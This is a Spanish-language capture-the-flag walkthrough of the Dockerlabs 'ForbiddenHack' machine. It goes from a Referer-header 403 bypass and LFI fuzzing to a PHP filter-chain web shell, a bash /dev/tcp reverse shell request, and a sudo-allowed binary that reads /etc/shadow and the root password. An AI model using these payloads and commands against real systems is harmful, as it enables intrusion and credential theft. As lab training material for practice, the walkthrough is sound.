# CTF ForbiddenHack Easy URL Download CTF = ### Instalación Cuando obtenemos el `.zip` nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente. ```shell unzip forbiddenhack.zip ``` Nos lo descomprimira y despues montamos la maquina de la siguiente forma. ```shell bash auto_run.sh forbiddenhack.tar ``` Info: ``` ██████╗ ██╗ ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╔══██╗██║ ██║████╗ ██║╚════██╗██╔══██╗██║ ██████╔╝██║ █╗ ██║██╔██╗ ██║ █████╔╝██║ ██║██║ ██╔═══╝ ██║███╗██║██║╚██╗██║ ╚═══██╗██║ ██║╚═╝ ██║ ╚███╔███╔╝██║ ╚████║██████╔╝██████╔╝██╗ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═╝ == @+:@ @##@ @++:-----+@ @@#+:----:+# #-+-----:+:---------: *::-----++-----::::# ::------+:--------: #-+------+:-::-----#@ *::+=@@#++-------::@ @+= @++::+#@@@#*# #-@ *+#++@ +-:::+-@ :-:+:::+ @+::*:::: *::++-::* =:--:-:++ @-# #*:---:--++@ @@ @::-:--++* @::-:++# *++* :: Plataforma de máquinas vulnerables :: :: Desarrollado por Pwn3d! y Dockerlabs - creado por @d1se0 :: █▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█ █ FLAG{Pwn3d!_is_awesome!} █ █▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█ [✔] bc ya está instalado. [✔] Docker ya está instalado [!] Limpiando previos contenedores e imágenes [✔] Cargando la máquina virtual [✔] Activando máquina virtual [✔] Máquina activa. Dirección IP: 172.17.0.2 [!] Presiona Ctrl+C para limpiar y salir ``` Por lo que cuando terminemos de hackearla, le damos a `Ctrl+C` y nos eliminara la maquina para que no se queden archivos basura. ### Escaneo de puertos ```shell nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn ``` ```shell nmap -sCV -p ``` Info: ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 05:36 EDT Nmap scan report for 172.17.0.3 Host is up (0.000040s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.58 (Ubuntu) MAC Address: 02:42:AC:11:00:03 (Unknown) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds ``` Veremos que hay un puerto `80` en el que aloja una pagina web, si entramos dentro de la misma veremos una pagina normal de `apache2` pero con un toque diferente en esta parte de aqui: ``` (located at /var/www/bypass403.pw/index.php) ``` Vemos que hay un `dominio` por lo que vamos añadirlo en nuestro archivo `hosts` de esta forma: ```shell nano /etc/hosts #Dentro del nano bypass403.pw ``` Lo guardamos y entraremos en dicho dominio a ver que nos encontramos. ``` URL = http://bypass403.pw/ ``` Cuando entremos dentro veremos directamente un `403 Forbidden`:
Vamos a probar a realizar un `bypass` simple del mismo a ver si nos funciona, vamos abrir `BurpSuite` y capturar la peticion quedando algo asi: ``` GET / HTTP/1.1 Host: bypass403.pw User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` Ahora le tendremos que añadir debajo del `Host:` la palabra `Referer:` para que se piense el servidor que se esta realizando la peticion desde el mismo servidor y nos permita visualizar el contenido. ``` GET / HTTP/1.1 Host: bypass403.pw Referer: http://bypass403.pw User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` Vamos a enviar esta peticion el `Repeater` de `BurpSuite` haciendo `Ctrl+R`, una vez enviado le daremos a `send` y veremos que nos devuelve una respuesta de `200 OK` por lo que ha funcionado:
Ahora vamos a realizar un poco de `fuzzing` poniendo en la cabecera de la peticion el `Referer` y con el recurso web llamado `index.php` que es el que hemos visto antes, como tiene `.php` vamos a comprobar si tuviera algun parametro vulnerable. ## FFUF ```shell ffuf -u "http://bypass403.pw/index.php?FUZZ=/etc/passwd" -w -H "Referer: http://bypass403.pw" -fs 1192 ``` Info: ``` /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://bypass403.pw/index.php?FUZZ=/etc/passwd :: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt :: Header : Referer: http://bypass403.pw :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 1192 ________________________________________________ pages [Status: 200, Size: 888, Words: 3, Lines: 20, Duration: 0ms] :: Progress: [20469/20469] :: Job [1/1] :: 50 req/sec :: Duration: [0:00:05] :: Errors: 0 :: ``` Veremos que efectivamente hay un parametro llamado `pages`, vamos a comprobar que realmente esta leyendo el archivo `passwd`. En la peticion de `BurpSuite` vamos a realizar lo siguiente: ``` GET /index.php?pages=/etc/passwd HTTP/1.1 Host: bypass403.pw Referer: http://bypass403.pw User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` Info:
Por lo que vemos esta funcionando, por lo que vamos a utilizar en este `LFI` unos `wrappers` paar poder ejecutar un `RCE` a ver si nos funciona. ### Wrapper con LFI URL\_Script = Si queremos por ejemplo crear un parametro llamado `cmd` que ejecute cualquier comando que le pongamos, seria de la siguiente forma... ``` $ python3 php_filter_chain_generator.py --chain '' [+] The following gadget chain will generate the following code : (base64 value: PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWyJjbWQiXSk7Pz4) php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp ``` Copiamos lo que empieza con `php://...` y lo pegaremos despues del `=` en el parametro `pages=`. ``` GET /index.php?cmd=whoami&pages= HTTP/1.1 Host: bypass403.pw Referer: http://bypass403.pw User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` Info:
Vemos que esta funcionando, esta ejecutando codigo de forma remota en el servidor, vamos a realizar una `reverse shell` de esta forma: ``` GET /index.php?cmd=bash+%20-c+%20"bash+%20-i+%20>%26+%20/dev/tcp//+%200>%261"&pages= HTTP/1.1 Host: bypass403.pw Referer: http://bypass403.pw User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` Antes de enviarlo nos pondremos a la escucha: ```shell nc -lvnp ``` Ahora si enviamos ese anterior comando y volvemos a donde tenemos la escucha veremos lo siguiente: ``` listening on [any] 7777 ... connect to [192.168.177.129] from (UNKNOWN) [172.17.0.3] 58472 bash: cannot set terminal process group (24): Inappropriate ioctl for device bash: no job control in this shell www-data@dd55b9d58d01:/var/www/bypass403.pw$ whoami whoami www-data ``` Vemos que ha funcionado, por lo que sanitizaremos la shell. ### Sanitización de shell (TTY) ```shell script /dev/null -c bash ``` ```shell # + stty raw -echo; fg reset xterm export TERM=xterm export SHELL=/bin/bash # Para ver las dimensiones de nuestra consola en el Host stty size # Para redimensionar la consola ajustando los parametros adecuados stty rows columns ``` ## Escalate user bambi Si listamos la `/home` del usuario `bambi` veremos una carpeta oculta llamada `.secret` que dentro contendra un archivo llamado `interestingSecret.txt`, si leemos dicho archivo veremos lo siguiente: ``` bambi:c3VwZXJzZWNyZXRwYXNzd29yZDEyMw ``` Vemos que son las credenciales de `bambi` pero la contraseña esta codificada en `Base64`, si la decodificamos veremos lo siguiente: ```shell echo "c3VwZXJzZWNyZXRwYXNzd29yZDEyMw" | base64 -d ``` Info: ``` supersecretpassword123 ``` Ahora vamos a probarla con dicho usuario de esta forma: ```shell su bambi ``` Metemos como contraseña `supersecretpassword123` y veremos que estaremos dentro, por lo que leeremos la `flag` del usuario. > user.txt ``` 770337092f4f568ddb32ec2afa3d5284 ``` ## Escalate Privileges Si listamos los archivos o binarios que `root` a creado de forma reciente veremos lo siguiente: ```shell find /var /etc /root /usr/bin -user root -type f -printf '%T@ %p\n' 2>/dev/null | sort -n | tail ``` Info: ``` 1749547624.0000000000 /var/log/apt/history.log 1749547624.0000000000 /var/log/apt/term.log 1749547624.0000000000 /var/log/dpkg.log 1749547637.0000000000 /usr/bin/furb 1749547783.0000000000 /etc/shadow 1749547854.0000000000 /var/backups/furbRead.txt 1749547955.0000000000 /var/www/html/index.html 1749548198.4564865530 /etc/resolv.conf 1749548198.4644862150 /etc/hostname 1749548199.1244584210 /etc/hosts ``` Vemos `2` archivos muy interesantes que son los siguiente: ``` /usr/bin/furb /var/backups/furbRead.txt ``` Vamos a ver que hace el binario `furb` con `strings`. ```shell strings /usr/bin/furb ``` Info: ``` .................................................................. Error: Missing file argument for -r .................................................................. ``` Vemos esa linea muy interesante con un parametro `-r` ya que si ejecutamos el binario directamente vemos esto: ```shell furb --help ``` Info: ``` furb version 1.0 Usage: furb --help Show this help message furb --version Show version information furb --list List installed items ``` Pero si hacemos `sudo -l` veremos lo siguiente: ``` Matching Defaults entries for bambi on e6f67923b724: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User bambi may run the following commands on e6f67923b724: (ALL : ALL) NOPASSWD: /usr/bin/furb ``` Vemos que podemos ejecutar el binario `furb` como el usuario `root` y tambien hemos visto antes que con el parametro `-r` faltaba el argumento de un archivo, vamos a probar lo siguiente: ```shell sudo furb -r /etc/shadow ``` Info: ``` root:$y$j9T$djr/6OzFs5YQBGkXwyusg0$OJCmQMUtPM.g1Jw/6wVW9ZSEgHfnZq5EW6mPRygleO/:20249:0:99999:7::: daemon:*:20237:0:99999:7::: bin:*:20237:0:99999:7::: sys:*:20237:0:99999:7::: sync:*:20237:0:99999:7::: games:*:20237:0:99999:7::: man:*:20237:0:99999:7::: lp:*:20237:0:99999:7::: mail:*:20237:0:99999:7::: news:*:20237:0:99999:7::: uucp:*:20237:0:99999:7::: proxy:*:20237:0:99999:7::: www-data:*:20237:0:99999:7::: backup:*:20237:0:99999:7::: list:*:20237:0:99999:7::: irc:*:20237:0:99999:7::: _apt:*:20237:0:99999:7::: nobody:*:20237:0:99999:7::: bambi:$y$j9T$r/nmv1Fl0wMa/zmw2HmP91$DEcAUEemN/paeO/sO0nMG05p6YvjKLcVpbTV3qvRC1D:20249:0:99999:7::: ``` Vemos que esta funcionando, pero antes hemos visto el archivo llamado `furbRead.txt` vamos a ver que contiene: ``` cat /var/backups/furbRead.txt ``` Info: ``` Interesante este nombre de archivo, donde mas puede encontrarse? ``` Vemos que nos esta dando una pista bastante interesante, puede ser que este mismo archivo este en la carpeta de `root`, vamos a probar lo siguiente: ```shell sudo furb -r /root/furbRead.txt ``` Info: ``` StrongPasswordRootSuperSecret123 ``` Vemos que ha funcionado por lo que vamos a probar la contraseña con el usuario `root` a ver si funciona. ```shell su root ``` Metemos como contraseña `StrongPasswordRootSuperSecret123` y veremos que seremos `root`, por lo que leeremos la `flag` de `root`. > root.txt ``` cded3f7971d8b7ce0b7f57baeb7112fc ```